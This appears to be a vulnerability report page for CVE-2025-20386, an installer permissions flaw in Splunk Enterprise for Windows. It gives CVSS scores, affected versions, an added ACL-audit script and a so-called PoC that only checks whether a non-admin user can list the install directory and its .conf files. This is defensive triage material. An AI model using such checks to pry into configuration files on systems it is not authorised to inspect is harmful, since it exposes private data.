Security Vulnerability Report
CVE-2025-20386 CVSS 8.0 HIGH

CVE-2025-20386

Published: 2025-12-03 17:15:51
Last Modified: 2025-12-05 17:51:42

Description

In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Splunk Enterprise for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents.

CVSS Details

Two CVSS v3.1 assessments are published for this CVE; the page banner shows the first.

CVSS Score (Secondary metric, supplied by the CNA)
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS Score (Primary metric, NVD analysis)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Weakness
CWE-732 (Incorrect Permission Assignment for Critical Resource)

Note that both vectors rate the attack vector as Network, while the description is of non-administrator users on the same machine reading the installation directory; the NVD assessment scores only the confidentiality impact. When triaging, treat this as a local information-disclosure issue on any Windows host where standard users can log on or run code.

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* from 9.2.0 up to (excluding) 9.2.10 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* from 9.3.0 up to (excluding) 9.3.8 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* from 9.4.0 up to (excluding) 9.4.6 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* from 10.0.0 up to (excluding) 10.0.2 - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform condition: the Splunk build must be running on Windows)
Splunk Enterprise for Windows 9.2.x < 9.2.10
Splunk Enterprise for Windows 9.3.x < 9.3.8
Splunk Enterprise for Windows 9.4.x < 9.4.6
Splunk Enterprise for Windows 10.0.x < 10.0.2

The fixed releases are 9.2.10, 9.3.8, 9.4.6 and 10.0.2; the NVD configuration does not enumerate branches older than 9.2, so consult the vendor advisory for those.
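The following is an added example, not part of this report and not Splunk's own tooling. It does the two checks a practitioner wants for this CVE on a Windows host: whether the installed version falls inside one of the affected ranges in the configuration above, and whether the installation directory's ACL (as printed by `icacls`) grants access to a principal that every non-administrator belongs to, which is the condition the description calls out. Assumptions: `etc\splunk.version` carries a `VERSION=` line; the `icacls` output layout is path followed by one `IDENTITY:(flags)(rights)` entry per line with deny entries marked `(DENY)`; the well-known principal names are the English ones (compare SIDs on localized builds); the sample `icacls` text and the `NT SERVICE\Splunkd` identity in it are constructed for the example, not captured from a real system.

```python
#!/usr/bin/env python3
"""Audit a Splunk Enterprise for Windows install for CVE-2025-20386 (added example)."""
import re
import subprocess
import sys
from typing import Dict, List, Tuple

# Affected ranges exactly as listed in the NVD configuration:
# versionStartIncluding .. versionEndExcluding.
AFFECTED_RANGES: List[Tuple[Tuple[int, ...], Tuple[int, ...]]] = [
    ((9, 2, 0), (9, 2, 10)),
    ((9, 3, 0), (9, 3, 8)),
    ((9, 4, 0), (9, 4, 6)),
    ((10, 0, 0), (10, 0, 2)),
]

# Principals that every non-administrator user is a member of. Assumption: English
# well-known names; on localized Windows compare SIDs (S-1-5-32-545, S-1-1-0,
# S-1-5-11, S-1-5-4, S-1-5-32-546) instead of names.
NON_ADMIN_PRINCIPALS = {
    "builtin\\users",
    "everyone",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
    "builtin\\guests",
}

# icacls tokens that describe inheritance or ACE type rather than rights.
NON_RIGHTS_FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}


def parse_version(text: str) -> Tuple[int, ...]:
    """Extract the numeric version from 'VERSION=9.4.5' (etc\\splunk.version) or '9.4.5'."""
    m = re.search(r"(?m)^(?:VERSION=)?\s*(\d+(?:\.\d+)+)\s*$", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected_version(version: str) -> bool:
    """True when the version lies in one of the published affected ranges."""
    v = parse_version(version)
    if len(v) < 3:
        v = v + (0,) * (3 - len(v))  # pad '9.4' to '9.4.0' for tuple comparison
    return any(start <= v < end for start, end in AFFECTED_RANGES)


def parse_icacls(output: str, path: str) -> List[Dict[str, object]]:
    """Parse `icacls <path>` output into ACE dicts (identity, rights, inherited, denied).

    The path is printed once, on the first line, ahead of the first ACE, so it is
    stripped before splitting. Identities may contain spaces and a backslash, so
    each line is split on its last colon (the drive-letter colon is gone by then).
    """
    aces: List[Dict[str, object]] = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        if not line or ":" not in line or line.lower().startswith("successfully"):
            continue
        identity, _, flags = line.rpartition(":")
        parts = re.findall(r"\(([^)]*)\)", flags)
        rights = [r for p in parts if p not in NON_RIGHTS_FLAGS for r in p.split(",")]
        aces.append({
            "identity": identity.strip(),
            "rights": rights,
            "inherited": "I" in parts,
            "denied": "DENY" in parts,
        })
    return aces


def non_admin_access(aces: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Allow ACEs that grant any right to a principal all non-admin users belong to."""
    return [a for a in aces
            if str(a["identity"]).lower() in NON_ADMIN_PRINCIPALS
            and a["rights"] and not a["denied"]]


def audit_live_host(install_dir: str = r"C:\Program Files\Splunk") -> List[Dict[str, object]]:
    """Run icacls on the local Windows host and return the offending ACEs."""
    if sys.platform != "win32":
        raise RuntimeError("icacls is only available on Windows")
    out = subprocess.run(["icacls", install_dir], capture_output=True,
                         text=True, check=True).stdout
    return non_admin_access(parse_icacls(out, install_dir))


# Constructed sample resembling `icacls "C:\Program Files\Splunk"` on a host where the
# installer left BUILTIN\Users with read/execute. Not captured from a real system;
# NT SERVICE\Splunkd is a hypothetical service identity.
SAMPLE_ICACLS = """C:\\Program Files\\Splunk NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                        BUILTIN\\Administrators:(OI)(CI)(F)
                        BUILTIN\\Users:(OI)(CI)(RX)
                        NT SERVICE\\Splunkd:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    sample_version = "VERSION=9.4.5\nBUILD=abcdef\nPRODUCT=splunk\n"  # constructed file content
    print("affected version:", is_affected_version(sample_version))
    for ace in non_admin_access(parse_icacls(SAMPLE_ICACLS, r"C:\Program Files\Splunk")):
        tag = " (inherited)" if ace["inherited"] else ""
        print(f"[!] {ace['identity']} has {','.join(ace['rights'])}{tag}")
```

On a real host call `audit_live_host()` from a standard (non-elevated) user session after reading the version from `etc\splunk.version`; an inherited entry (`(I)`) still counts, since inherited read access from the parent directory is exactly what exposes the contents. The remediation the report supports is upgrading to a fixed release rather than hand-editing the ACL.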

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-20386 PoC - Splunk Enterprise for Windows permission misconfiguration

Note: This is a conceptual PoC for educational and security testing purposes only.
"""
import os
import sys
import ctypes


def check_splunk_directory_permissions():
    """
    Check if the Splunk installation directory has insecure permissions that
    allow non-admin users to read its contents.
    """
    splunk_paths = [
        r"C:\Program Files\Splunk",
        r"C:\Program Files (x86)\Splunk",
        r"C:\ProgramData\Splunk",
    ]
    results = []
    for path in splunk_paths:
        if not os.path.exists(path):
            continue
        print(f"[*] Checking permissions for: {path}")
        try:
            # Check if the current user can list directory contents
            files = os.listdir(path)
            print("[+] Successfully listed directory contents")
            print(f"[+] Found {len(files)} items in directory")
            # Check whether configuration files are visible
            conf_files = [f for f in files if f.endswith('.conf')]
            if conf_files:
                print(f"[+] Found .conf files: {conf_files[:5]}")
            results.append({"path": path, "accessible": True, "file_count": len(files)})
        except PermissionError:
            print(f"[-] Access denied to {path}")
            results.append({"path": path, "accessible": False, "error": "Permission denied"})
    return results


def check_splunk_version():
    """Attempt to determine the Splunk version from the installed instance."""
    version_file = r"C:\Program Files\Splunk\etc\splunk.version"
    if os.path.exists(version_file):
        try:
            with open(version_file, 'r') as f:
                content = f.read()
            print(f"[*] Splunk version info:\n{content}")
            return content
        except OSError as e:
            print(f"[-] Could not read {version_file}: {e}")
    return None


def main():
    print("=" * 60)
    print("CVE-2025-20386 PoC - Splunk Enterprise Windows Permission Issue")
    print("=" * 60)

    # Check if running on Windows
    if sys.platform != 'win32':
        print("[-] This PoC is designed for Windows systems")
        return

    # Get current user info
    is_admin = bool(ctypes.windll.shell32.IsUserAnAdmin())
    print(f"[*] Current user: {os.getenv('USERNAME')}")
    print(f"[*] Running as admin: {is_admin}")

    # Check Splunk version
    print("\n[*] Checking Splunk installation...")
    check_splunk_version()

    # Check directory permissions
    print("\n[*] Checking directory permissions...")
    results = check_splunk_directory_permissions()

    # Summary
    print("\n" + "=" * 60)
    print("SUMMARY")
    print("=" * 60)
    if is_admin:
        # An administrator can always list the directory, so a successful
        # listing says nothing about the ACL; rerun as a standard user.
        print("[?] INCONCLUSIVE: rerun this check as a non-administrator user")
    elif any(r.get('accessible', False) for r in results):
        print("[!] VULNERABLE: Splunk directory is accessible to non-admin users")
        print("[!] This could allow privilege escalation and information disclosure")
    else:
        print("[+] NOT VULNERABLE: Directory permissions appear correct")


if __name__ == "__main__":
    main()
```

References

https://advisory.splunk.com/advisories/SVD-2025-1205 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-20386", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.080", "lastModified": "2025-12-05T17:51:41.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Splunk Enterprise for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise para Windows inferiores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, una nueva instalación o una actualización a una versión afectada puede resultar en una asignación incorrecta de permisos en el directorio de instalación de Splunk Enterprise para Windows. Esto permite a los usuarios no administradores de la máquina acceder al directorio y a todo su contenido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1205", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```